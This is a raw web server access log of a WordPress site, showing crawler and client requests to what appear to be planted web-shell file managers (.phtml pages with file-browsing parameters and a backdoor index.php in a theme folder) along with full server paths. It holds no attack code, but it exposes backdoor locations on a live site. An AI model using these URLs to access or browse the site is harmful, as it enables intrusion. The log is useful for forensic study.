57.141.18.92 57.141.18.92 - - [20/Mar/2026:00:52:19 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/application-passwords.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.44 57.141.18.44 - - [20/Mar/2026:00:52:19 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/image-edit.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13007 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.92 57.141.18.92 - - [20/Mar/2026:00:52:20 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/tags-box.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.73 57.141.18.73 - - [20/Mar/2026:00:52:21 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/common.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13003 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.106 57.141.18.106 - - [20/Mar/2026:00:52:22 -0300] "GET /shop/chasmy/imploration012730221671.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-http-response.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16243 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.119 57.141.18.119 - - [20/Mar/2026:00:52:23 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/site-health.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.54 57.141.18.54 - - [20/Mar/2026:00:52:23 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/theme-plugin-editor.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13020 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.0 57.141.18.0 - - [20/Mar/2026:00:52:23 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/password-toggle.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 14378 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.120 57.141.18.120 - - [20/Mar/2026:00:52:23 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/privacy-tools.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:20 -0300] "GET /wp-admin/css/colors/blue/blue/statics/wp-login.php HTTP/1.1" 200 12 "https://bandeirantesbombas.com.br/wp-admin/css/colors/blue/blue/statics/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.98 57.141.18.98 - - [20/Mar/2026:00:52:24 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/svg-painter.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.121 57.141.18.121 - - [20/Mar/2026:00:52:24 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/revisions.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13010 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.44 57.141.18.44 - - [20/Mar/2026:00:52:24 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/widgets.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.84 57.141.18.84 - - [20/Mar/2026:00:52:24 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/ms-network.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.42 57.141.18.42 - - [20/Mar/2026:00:52:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/about.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13010 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.19 57.141.18.19 - - [20/Mar/2026:00:52:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/comment.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 15118 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.41 57.141.18.41 - - [20/Mar/2026:00:52:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/accordion.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 14271 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.68 57.141.18.68 - - [20/Mar/2026:00:52:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/user-profile.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13009 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:26 -0300] "GET /wp-content/themes/twentytwentyfive/assets/css/audits/index.php HTTP/1.1" 200 381 "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.36 57.141.18.36 - - [20/Mar/2026:00:52:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/user-suggest.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 14182 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.50 57.141.18.50 - - [20/Mar/2026:00:52:26 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-post.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.9 57.141.18.9 - - [20/Mar/2026:00:52:27 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/abilities-api.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:27 -0300] "POST /wp-content/themes/twentytwentyfive/assets/css/audits/index.php HTTP/1.1" 200 12250 "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.22 57.141.18.22 - - [20/Mar/2026:00:52:27 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/IXR HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
69.30.215.34 - - [20/Mar/2026:00:52:26 -0300] "GET /wp-content/pl294f89/edit.php HTTP/1.1" 500 - "https://bandeirantesbombas.com.br/wp-content/pl294f89/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.110 57.141.18.110 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/nav-menu.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13005 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.101 57.141.18.101 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/site-icon-rtl.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.27 57.141.18.27 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/block-editor.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.99 57.141.18.99 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/block-bindings.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.26 57.141.18.26 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/post.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13001 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.74.160 - - [20/Mar/2026:00:52:28 -0300] "GET /shop/breadroot/earthlike013682884731.phtml HTTP/1.1" 200 211397 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.97.160.166 - - [20/Mar/2026:00:52:29 -0300] "POST /wp-content/themes/twentytwentyfive/assets/css/audits/index.php HTTP/1.1" 302 - "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
80.97.160.166 - - [20/Mar/2026:00:52:30 -0300] "GET /wp-content/themes/twentytwentyfive/assets/css/audits/index.php?dir=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes/twentytwentyfive/assets/css/audits HTTP/1.1" 200 14108 "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.111 57.141.18.111 - - [20/Mar/2026:00:52:30 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/auth-app.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16047 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.33 57.141.18.33 - - [20/Mar/2026:00:52:29 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/sodium_compat HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.105 57.141.18.105 - - [20/Mar/2026:00:52:30 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/custom-background.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.69 57.141.18.69 - - [20/Mar/2026:00:52:30 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/auth-app.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.84 57.141.18.84 - - [20/Mar/2026:00:52:30 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/theme.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13002 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.99 57.141.18.99 - - [20/Mar/2026:00:52:31 -0300] "GET /shop/mislearn/autoinfection012904247160.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/plugins/wibezam HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.42 57.141.18.42 - - [20/Mar/2026:00:52:31 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/image-edit.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13011 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.29 57.141.18.29 - - [20/Mar/2026:00:52:31 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/code-editor.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.21 57.141.18.21 - - [20/Mar/2026:00:52:31 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/custom-background.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 14849 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.5 57.141.18.5 - - [20/Mar/2026:00:52:31 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/widgets.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13008 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.1 57.141.18.1 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/postbox.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.106 57.141.18.106 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/ms-files.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16141 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.55 57.141.18.55 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-dependency.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 15887 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.99 57.141.18.99 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/forms-rtl.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13014 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:32 -0300] "POST /wp-content/themes/twentytwentyfive/assets/css/audits/index.php HTTP/1.1" 302 - "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.48 57.141.18.48 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/customize-widgets.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13014 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.44 57.141.18.44 - - [20/Mar/2026:00:52:32 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/color-picker.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.65 57.141.18.65 - - [20/Mar/2026:00:52:33 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/customize-widgets.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13018 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.11 57.141.18.11 - - [20/Mar/2026:00:52:33 -0300] "GET /shop/chasmy/imploration012730221671.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-paused-extensions-storage.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.15 57.141.18.15 - - [20/Mar/2026:00:52:33 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/site-icon.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16124 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.48 57.141.18.48 - - [20/Mar/2026:00:52:33 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/version.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 14318 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.54 57.141.18.54 - - [20/Mar/2026:00:52:33 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-xmlrpc-server.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.108 57.141.18.108 - - [20/Mar/2026:00:52:34 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/inline-edit-post.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13013 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.88 57.141.18.88 - - [20/Mar/2026:00:52:34 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/site-health.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.24 57.141.18.24 - - [20/Mar/2026:00:52:34 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/media.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13010 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.72 57.141.18.72 - - [20/Mar/2026:00:52:34 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-block-type-registry.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.48 57.141.18.48 - - [20/Mar/2026:00:52:35 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-walker-nav-menu.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 404 196 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.2 57.141.18.2 - - [20/Mar/2026:00:52:34 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/pluggable-deprecated.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
80.97.160.166 - - [20/Mar/2026:00:52:35 -0300] "GET /wp-content/themes/twentytwentyfive/assets/css/audits/index.php?dir=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes/twentytwentyfive/assets/css/audits HTTP/1.1" 200 15903 "https://bandeirantesbombas.com.br/wp-content/themes/twentytwentyfive/assets/css/audits/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
57.141.18.28 57.141.18.28 - - [20/Mar/2026:00:52:35 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/query.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.15 57.141.18.15 - - [20/Mar/2026:00:52:35 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/about-rtl.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13010 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.96 57.141.18.96 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/plugin-install.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.20 57.141.18.20 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/editor.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.103 57.141.18.103 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-block-type.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.13 57.141.18.13 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/customize-nav-menus.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.61 57.141.18.61 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/accordion.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.105 57.141.18.105 - - [20/Mar/2026:00:52:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/edit-rtl.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13013 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.41 57.141.18.41 - - [20/Mar/2026:00:52:38 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/colors HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.89 57.141.18.89 - - [20/Mar/2026:00:52:39 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/customize-controls-rtl.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 16384 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
